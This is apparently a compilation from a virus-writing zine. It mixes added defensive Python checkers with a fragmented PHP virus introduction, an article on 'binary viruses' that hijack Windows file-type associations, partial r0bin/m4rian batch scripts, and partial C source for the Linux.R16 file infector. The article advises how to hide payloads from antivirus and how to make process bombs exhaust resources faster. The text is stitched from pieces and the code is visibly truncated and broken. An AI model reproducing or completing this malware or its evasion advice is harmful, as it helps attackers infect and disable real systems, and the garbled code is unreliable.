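Both macro virus descriptions above boil down to a handful of on-disk artefacts: a Run value that masquerades as "Norton Auto-Protect" but launches C:\Windows\Backup.vbs, Word's macro security Level forced to 1 through System.PrivateProfileString, and autostart lines written into win.ini. The following is an added example, not part of either description: a small checker that parses a regedit export and a win.ini text and reports those indicators. The .reg export and win.ini contents are constructed samples shaped like the real files; the xtcspawn.exe name in the win.ini sample is the file name the XTC worm uses.

```python
# Added example, not part of the Furio or Karma descriptions: checker for the
# persistence and security-downgrade artefacts they name. Sample inputs are constructed.
import configparser
import re
from typing import Dict, List

RUN_KEYS = (
    r"hkey_local_machine\software\microsoft\windows\currentversion\run",
    r"hkey_current_user\software\microsoft\windows\currentversion\run",
)
WORD_SECURITY_KEY = r"hkey_current_user\software\microsoft\office\9.0\word\security"
SCRIPT_EXTENSIONS = (".vbs", ".js", ".wsf")


def parse_reg(text: str) -> Dict[str, Dict[str, object]]:
    """Parse a regedit export into {key (lower-cased): {value name: value}}.
    Handles quoted strings (with \\\\ escapes) and dword: values, which is all the
    indicators here need."""
    keys: Dict[str, Dict[str, object]] = {}
    current = None
    for line in text.splitlines():
        line = line.strip()
        m = re.match(r"^\[(.+)\]$", line)
        if m:
            current = m.group(1).lower()
            keys[current] = {}
            continue
        m = re.match(r'^"([^"]+)"=(.*)$', line)
        if m and current is not None:
            name, raw = m.groups()
            if raw.startswith("dword:"):
                keys[current][name] = int(raw[6:], 16)
            elif len(raw) >= 2 and raw[0] == raw[-1] == '"':
                keys[current][name] = raw[1:-1].replace("\\\\", "\\")
            else:
                keys[current][name] = raw
    return keys


def check_registry(keys: Dict[str, Dict[str, object]]) -> List[str]:
    """Flag Run values that start a script and a Word 2000 security level of 1."""
    findings = []
    for key in RUN_KEYS:
        for name, cmd in keys.get(key, {}).items():
            if isinstance(cmd, str) and cmd.lower().endswith(SCRIPT_EXTENSIONS):
                findings.append(f"Run value '{name}' launches a script: {cmd}")
    if keys.get(WORD_SECURITY_KEY, {}).get("Level") == 1:
        findings.append("Word 2000 macro security Level is 1 (lowest)")
    return findings


def check_win_ini(text: str) -> List[str]:
    """Flag non-empty run=/load= lines, the classic pre-registry autostart."""
    cp = configparser.ConfigParser(interpolation=None, allow_no_value=True)
    cp.read_string(text)
    findings = []
    for section in cp.sections():
        for name, value in cp.items(section):
            if name in ("run", "load") and value:
                findings.append(f"win.ini [{section}] {name}={value}")
    return findings


# Constructed regedit export with the two registry indicators from the descriptions.
SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
"Norton Auto-Protect"="C:\\Windows\\Backup.vbs"

[HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security]
"Level"=dword:00000001
"""

# Constructed win.ini with an autostart line.
SAMPLE_WIN_INI = """[windows]
load=
run=C:\\WINDOWS\\xtcspawn.exe
"""

if __name__ == "__main__":
    for finding in check_registry(parse_reg(SAMPLE_REG)) + check_win_ini(SAMPLE_WIN_INI):
        print(finding)
```

The Run check deliberately keys on what the value launches rather than on its display name: the descriptions show the name chosen to look like an installed product, so a name-based allow list would pass it.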
Introduction
------------
After reading about Samhain, I couldn't help noticing the power of this language.
This virus (or call it a companion trojan) is only intended as proof-of-concept code
and is NOT DESIGNED to be in the wild in any manner. I wanted other, more capable
and brilliant vx authors to look at PHP for their future projects. I also needed
this to keep my spirits up, with DIV (my main vx project) becoming very depressing.
Technical Explanation
---------------------
First let me tell you how to create an environment for testing and improving the
bug.
a) For Win 9x/NT/2k users
Now fire up localhost and run pirus.php; after a successful "install" of the bug,
test.php should have a line at the end of the file which reads
Well, you people are born clever :). In case you run into any problem, seek the
linux spirit inside you or contact me!
Possible improvements :
-----------------------
Shell script, encryption, polymorphism like Samhain, network ability, better stealth,
appending, good host scripts which will be downloaded and used by many lame webmasters
Greets (random) :
-----------------
E-MAIL : maskbits@crosswinds.net
WWW : www.vxi.cjb.net
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[PIRUS.TXT]ÄÄÄ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[BINVIRUS.TXT]ÄÄÄ
Binary Viruses:
===============
To my life's woman
1. Abstract:
---------
I would not be wrong if I said that whoever is reading this paper knows the 'Mission:
Impossible' movies. Obviously, I don't want to discuss their artistic details, likes or
dislikes. But what we surely all agree about these films is the technological power they
show. It is amazing: we thought it was not possible to outdo James Bond's gadgets...
But we were definitely wrong... Once again, Ethan Hunt showed that it is always
possible to go one step beyond.
At this moment, I would like to recall the 'two-flavoured chewing gum' that Ethan Hunt
was given in the first 'Mission: Impossible'. That gum was nothing but a binary plastic
explosive. Each of those flavours was harmless on its own, but terribly powerful when
joined together. In that case, the movie star had only 5 seconds left to escape before
the explosion took place.
Ok, as you can imagine, this paper explains how to take this behaviour into the
digital world: binary viruses. The word 'virus' is used in its widest meaning: 'virus'
as the whole family of programs that share common goals, namely to execute code and to
spread over foreign machines, entering them by more or less furtive means. The final
intention of that execution varies with the program itself.
Worms and Trojan horses are, inside the virus world, the ones that best match the
scenarios we are going to discuss here. A binary worm is one structured in two pieces,
each depending on the other to achieve the final goal it was created for. If we remove
the ability to self-spread and self-reproduce, we have a binary trojan. In this
particular case, the trojan would only manifest its presence and activity when the
other part arrived.
A binary virus is just another example of non-authorized code execution which can be
potentially harmful. Over the following pages, we will study what a binary virus is. We
will see one implementation example and will try to analyze possible enhancements and
future research paths.
2. Description: r0bin-&-m4rian
---------------------------
r0bin & m4rian are the names of the two parts of our demonstrative example. It is a
basic example: it lacks self-replication and self-spreading abilities and it is harmless
to the system it runs on. Actually, once activated, it shows the following message:
echo --------------------------------------
echo m4rian,
echo.
echo I love you more than I can say.
echo I wish I could give you all my life.
echo.
echo r0bin
echo --------------------------------------
r0bin & m4rian can only be run on Windows NT and Windows 2000. I have released nothing
for Windows 9x because it is trivial. The fact that I focus on Windows platforms does
not mean that this model cannot be implemented on non-Microsoft systems (let's say Unix
and the like).
2.1 r0bin:
r0bin is the first part of the pair. Its mission is to register a new file type on a
Windows system. To be more accurate, it registers a .DZ file type and binds it to the
system shell command-line interpreter. Besides that, it also binds the file type to a
user-familiar desktop icon.
2.2 m4rian:
m4rian is a .DZ file that gets executed by the system command-line interpreter when
launched by the user. If self-spreading and self-reproducing capabilities were given,
they would be built inside m4rian. In our case, this part has not been implemented.
As everyone can see, r0bin is the head and main part of the team. Without the head, the
binary strategy is over.
This is the main problem and, at the same time, the main advantage of this approach.
Since both parts are required, if one of them is not present the other one is useless
or, being optimistic, left waiting for the other to arrive.
When talking about plastic explosives this is not a big problem, but it really is on a
distributed environment like a computer network. Both sides can reach a system at
initially random moments, with absolute independence, so success is not guaranteed.
Besides that, it must be the user who activates the bomb, by trying to run the .DZ
file or whatever file type the worm's head has registered or redefined.
In the example shown before, r0bin is a .cmd file lacking any intention of hiding
itself from anybody. Nevertheless, in case we want to introduce r0bin into a system in
a furtive manner, we can implement any one or a subset of the well-known techniques of
the virus and trojan scene: inside an executable file (a patch, an installation
program, an active document, a multimedia presentation, etc.). Can you set gates to
imagination? ;)
r0bin's success is based on performing a legal operation in the context of the user
running it. That is why its execution will go unnoticed by anyone on the system.
Opposite to this, m4rian needs to be a file of a certain type (as r0bin has registered
or defined). Well... this is not entirely true... ;). Let's go on.
3.2 N-arian viruses. Weaknesses: Achilles' heel:
Maybe you are wondering whether n-arian viruses might exist. The answer is yes. But,
due to their strong dependency on external factors, nobody can guarantee their
survival. In my honest opinion, they don't seem to be viable projects.
Though 3-arian (ternarian) viruses can be really interesting due to the possibilities
opened by code micro/emulation. In this particular case, r0bin, besides installing the
entry point to m4rian, would also drop and install the interpreter, engine or virtual
machine (VM) able to run m4rian successfully.
By code emulation we understand that either the language or the program code is
proprietary. They can only be understood under the platform that the virus carries by
itself. The same happens when considering the virtual machine approach: the bit chain
which is in m4rian is p-code of an unknown, non-standard and proprietary VM. Only the
virus creator/owner knows its specification. To read more about micro/emulation, you
can read 'Microemulación y Seguridad': http://www.deepzone.org/editions/others/microem.htm
Then, in this particular case, we can assume a weaker but more powerful virus. Its
survival chances decrease, but its ability to go unnoticed is considerably greater.
Until now, we have seen how r0bin & m4rian have their code uncovered. This is not
positive. The essence of a binary virus is to pass unnoticed, so clear-text code is not
desirable.
Computer science history shows lots of ways viruses use to hide themselves from the
sight of antivirus and protection systems. These techniques can be applied to r0bin
without restrictions. r0bin can be shipped inside any executable object.
Now we have m4rian. How to hide something that must be executed directly (shell script
code, WSH, VBA, etc.) and which is delivered to the victim as a stand-alone file?
We could think on m4rian implementations living inside HTML note tags as part of a
new file type readable by the locally installed browser.
Let's suppose r0bin registers the extension .DZHTML. We should also have registered the
proper MIME type to have the browser read the file. In this case, we need to process
the note tags before the browser takes place.
One option is to use emulation and have r0bin install an interpreter on the system.
This component would hand control to the browser immediately after processing the
note tags. Achieving this is as easy as invoking the interpreter in the 'open' action
of the MIME type assigned to .DZHTML.
Depending on where m4rian's file comes from, it may also be necessary to set the MIME
type on the server side. This is, of course, not a compulsory restriction.
Now, think for a while about the case of redefining the .HTML file type and its MIME
type definition ... ;)
Similar approaches can be built for other data types. The web case is especially
interesting because it allows m4rian to arrive from completely unexpected sources.
r0bin & m4rian use file type registration as the entry point. Nevertheless, the
Windows registry, INI files, INF files, etc. are full of surprises to be discovered,
and of operations that any user can legally perform while remaining unnoticed to any
onlooker.
It is quite possible that, over the following months, we will see new ways of creating
an entry point, and interesting binary exercises.
Depending on how the file type registration is made, it is very easy to create an
endless recursive process. This leads to continuous process creation and progressive
memory consumption on the operating system: a classic process bomb. This is one of the
undesirable side effects of r0bin & m4rian: a delayed bomb.
Let's see an example. If, when registering the .DZ file type, we select "CMD /C %1"
as the program to be launched to read that file, this is, step by step, what happens:
i. On trying to launch the .DZ file, the system looks up that file type in the
registry.
ii. The system finds an entry for the .DZ file type and tries to execute the program
associated with it.
iii. The system creates a new process.
iv. In that new process, the system launches CMD.EXE.
v. CMD.EXE tries to execute 'm4rian.dz', which is the file it was given as first
parameter (%1).
vi. We return to step i until system resources are exhausted.
This situation appears in every case where the file type registration follows the
structure <ext> => <program> <parameter.ext>. So, if we don't want r0bin & m4rian to
enter an infinite loop, we need to introduce an end condition in r0bin. One option
is to rename the file hosting m4rian and then run the renamed version.
On the other hand, if what we really want is to create a process bomb, methods for
faster resource exhaustion can be studied to minimize the victim's ability to stop it:
achieving geometric or logarithmic growth instead of linear. Another point to take
into account is process persistence, so that a process keeps the resources it owns
blocked. For example, with 'CMD /C' the process chain can be terminated by the user,
but with 'CMD /K' the user would have to kill each process one by one to free the
resources they hold.
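As an added example (not part of Nemo's article nor of r0bin), here is a small Python simulation of the association lookup described in steps i to vi: it follows the chain from an extension to its 'open' command and flags registrations whose command hands %1 back to a shell dispatcher such as CMD /C, the self-referencing pattern that produces the process bomb. The dispatcher list and the sample association table are constructed assumptions; the trace goes beyond the single .DZ case by following chains across several extensions and noting the CMD /K persistence variant.

```python
# Programs that hand the file back to the shell for another association
# lookup instead of opening it (constructed list, an assumption).
SHELL_DISPATCHERS = {"cmd", "cmd.exe", "start", "explorer", "explorer.exe"}
SWITCHES = {"/c", "/k", "/wait"}

# Constructed sample of per-user registrations: extension -> 'open' command.
SAMPLE_ASSOC = {
    ".dz": 'CMD /C "%1"',          # the article's self-referencing case
    ".dzk": 'CMD /K "%1"',         # same, but the shells persist (/K)
    ".dz2": "cmd /c other.dz",     # chains into the .dz loop
    ".txt": 'notepad.exe "%1"',    # ordinary handler: the chain ends here
}

def next_file(command, filename):
    """File the shell is asked to open next, or None if a real program runs."""
    tokens = [t.strip('"') for t in command.replace("%1", filename).split()]
    if not tokens:
        return None
    program = tokens[0].lower().rsplit("\\", 1)[-1]
    if program not in SHELL_DISPATCHERS:
        return None                # a proper handler consumes the file
    args = [t for t in tokens[1:] if t.lower() not in SWITCHES]
    return args[0] if args else None

def trace_launch(ext, assoc, limit=16):
    """Follow the association chain; return (loops, chain of (ext, command))."""
    filename = "m4rian" + ext      # constructed victim filename
    chain, seen = [], set()
    while filename is not None and len(chain) < limit:
        name_ext = ("." + filename.rsplit(".", 1)[1].lower()) if "." in filename else ""
        command = assoc.get(name_ext)
        if command is None:
            break                  # unregistered type: the shell gives up
        chain.append((name_ext, command))
        if name_ext in seen:
            return True, chain     # same lookup again: infinite recursion
        seen.add(name_ext)
        filename = next_file(command, filename)
    return False, chain

def audit(assoc):
    """Map each looping extension to a short finding for the reviewer."""
    findings = {}
    for ext, command in assoc.items():
        loops, _ = trace_launch(ext, assoc)
        if loops:
            persistent = "/k" in command.lower().split()
            findings[ext] = "process bomb" + (" (persistent shells)" if persistent else "")
    return findings
```

The same check can be fed from a real per-user Classes export by building the dictionary from each extension's shell\open\command value.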
r0bin is clearly the weakest point of the binary chain: kill the head and you kill the
tail. To make things easier, r0bin comes as, or with, executable content.
Privilege management on NT systems is useless most of the time, given that r0bin
performs an operation that is legal for a plain user on the system. Members of the
Windows 2000 'Users' group cannot perform this kind of operation, so r0bin cannot run
successfully under those credentials. But Windows 2000 ships with the 'Power Users'
group as a backward compatibility feature with NT 4 systems. This group has been
granted the same permissions the NT 4 'Users' group used to have, due to compatibility
issues with legacy applications. So a member of the 'Power Users' group under Windows
2000 can run r0bin successfully. Needless to say, all Windows 9x systems are also
affected.
On Windows 2000, applications must follow the 'Windows 2000 Application Specification
Requirements'. When an application doesn't meet this specification, there is no
guarantee that it can run successfully as a plain user under Windows 2000. This is the
case with a lot of software developed for NT4 or earlier and currently running in
production environments. That is the reason why, on many systems, users have more
privileges than those assigned by Windows 2000 by default. For more information about
this particular aspect: www.microsoft.com/technet/win2000/win2ksrv/technote/secdefs.asp
5. Conclusion:
------------
The success of this kind of creatures will be determined by these two factors:
unfortunately, the number of Win9x users is really large, and the domestic use of NT
and 2000 is far from responsible: privileges are not used and managed appropriately.
Anyway, binary worms and trojans are weak creatures. Time will tell what role this kind
of program will play in the virii ground.
--------------------------
Nemo - Nemo@deepzone.org
www.deepzone.org
DeepZone Digital Security
"The Deepest, The Highest"
--------------------------
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[BINVIRUS.TXT]ÄÄÄ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[R0BIN.CMD]ÄÄÄ
@echo off
cls
rem --------------------------------------------
rem r0bin v1.0 - 2000/10/22
rem Nemo@deepzone.org
rem
rem To my beloved girl. I love you more than I
rem can say. Wish I could give you all my life.
rem
rem Script description:
rem Automatic registration of a new file type
rem for the current user profile.
rem
rem Files required:
rem associate-nt4.exe - NT4 Resource Kit
rem associate-w2k.exe - Win2k Resource Kit
rem
rem IMPORTANT NOTES:
rem This script is not a trojan horse nor an
rem i-worm. It is a 'proof-of-concept' to
rem show a new way to spread and run
rem potentially harmful code on any Windows
rem machine.
rem --------------------------------------------
rem --------------------------------------------
rem m4rian v1.0 - 2000/10/22
rem Nemo@deepzone.org
rem
rem To my beloved girl. I love you more than I
rem can say. Wish I could give you all my life.
rem
rem Script description:
rem Displays a message on the console and
rem removes the file registration previously
rem installed by r0bin.
rem
rem Files required:
rem associate-nt4.exe - NT4 Resource Kit
rem associate-w2k.exe - Win2k Resource Kit
rem
rem IMPORTANT NOTES:
rem This script is not a trojan horse nor an
rem i-worm. It is a 'proof-of-concept' to
rem show a new way to spread and run
rem potentially harmful code on any Windows
rem machine.
rem --------------------------------------------
echo --------------------------------------
echo m4rian,
echo.
echo I love you more than I can say.
echo I wish I could give you all my life.
echo.
echo r0bin
echo --------------------------------------
echo.
// Include filez
#include <stdio.h>
#include <dirent.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <fcntl.h>
#include <unistd.h>
ssize_t ret;
int handle, bytes , retn;
char *buff[256];
char *ch,virus[VirusSize];
struct dirent *dirp;
DIR *dp;
char pathname[1024];
handle = open(argv[0],O_RDONLY);
read(handle,virus,VirusSize);
handle = creat ("/usr/sexloader",7);
if (handle == -1) {
printf("uf!");
}
write(handle,virus,VirusSize);
write(handle,virus,VirusSize);
write(handle,virus,VirusSize);
handle = open("/usr/tmp001x.not",O_RDWR);
if (handle == -1) {
handle = creat ("/usr/tmp001x.not",0);
if (handle == -1) {
exit(0);
}
printf ("\n\n");
printf ("\t\t""Linux.R16 by Radix16[MIONS]" " \n");// (c)oded
printf ("\t\t""I'am free virus for Linux :)" "\n");// Print text (textrezim)
printf ("\t\t""Made in Czech republic" "\n");// My World
printf ("\n\n");
exit(retn);
readdir(dp); readdir(dp);
while (1) {
if ((dirp = readdir(dp)) == NULL) {
closedir(dp);
return(0);
}
if (access(dirp->d_name,X_OK | W_OK) < 0) {
exit(-1);
}
write(handle,virus,VirusSize);
}
close(handle);
exit(retn);
// End program(virus)
}
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[R16.CPP]ÄÄÄ